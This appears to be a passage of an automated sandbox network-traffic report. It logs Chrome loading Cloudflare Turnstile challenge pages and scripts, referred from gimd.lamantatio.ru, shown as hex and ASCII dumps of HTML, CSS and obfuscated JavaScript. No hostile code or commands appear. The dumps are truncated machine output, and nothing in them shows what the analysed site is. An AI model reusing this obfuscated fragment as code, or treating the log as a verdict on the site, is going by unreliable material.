                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.449763104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:49 UTC798OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/ HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: iframe
                                                            Referer: https://gimd.lamantatio.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:49 UTC1362INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 26636
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                            cross-origin-embedder-policy: require-corp
                                                            cross-origin-opener-policy: same-origin
                                                            cross-origin-resource-policy: cross-origin
                                                            origin-agent-cluster: ?1
                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            referrer-policy: same-origin
                                                            document-policy: js-profiling
                                                            2025-01-06 15:53:49 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 64 63 65 32 31 32 38 61 64 61 34 31 66 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: Server: cloudflareCF-RAY: 8fdce2128ada41f5-EWRalt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:49 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                            2025-01-06 15:53:49 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.449764104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:49 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fdce2128ada41f5&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:50 UTC331INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:50 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 119493
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce217eaa24338-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:50 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65
                                                            Data Ascii: nstile_success":"Success%21","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fde
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 65 5a 2c 66 30 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 38 38 30 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 31 31 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 36 37 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 37 36 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 31 31 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 34 34 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 35 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49
                                                            Data Ascii: fY,ga,gg,gh,gi,gs,gD,gH,eZ,f0){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(880))/1*(-parseInt(gI(1611))/2)+-parseInt(gI(1867))/3*(-parseInt(gI(1676))/4)+parseInt(gI(611))/5+-parseInt(gI(844))/6+-parseInt(gI(705))/7+-parseInt(gI
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 69 3d 3d 68 7d 2c 27 43 47 61 50 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 44 51 70 6f 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 54 51 46 67 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 65 78 72 78 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 68 6e 45 71 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 75 46 49 73 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 45 72 4e 6f 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 62 54 52 65 64 27 3a
                                                            Data Ascii: i==h},'CGaPZ':function(h,i){return h!=i},'DQpow':function(h,i){return h*i},'TQFgL':function(h,i){return h&i},'exrxz':function(h,i){return i==h},'hnEqq':function(h,i){return i*h},'uFIsD':function(h,i){return h<i},'ErNog':function(h,i){return i==h},'bTRed':
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 28 35 31 34 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 64 5b 68 65 28 31 36 38 37 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 64 5b 68 65 28 35 35 31 29 5d 28 4c 2c 64 5b 68 65 28 37 32 37 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30 2c 4a 5b 68 65 28 37 30 32 29 5d 28 64 5b 68 65 28 36 34 37 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 68 65 28 35 31 34 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 64 5b 68 65 28 31 39 30 36 29 5d 28 4b 3c 3c 31 2e 38 36 2c 31 2e 38 36 26 50 29 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 68 65 28 37 30 32 29 5d 28 64 5b 68 65 28 36 34 37 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b
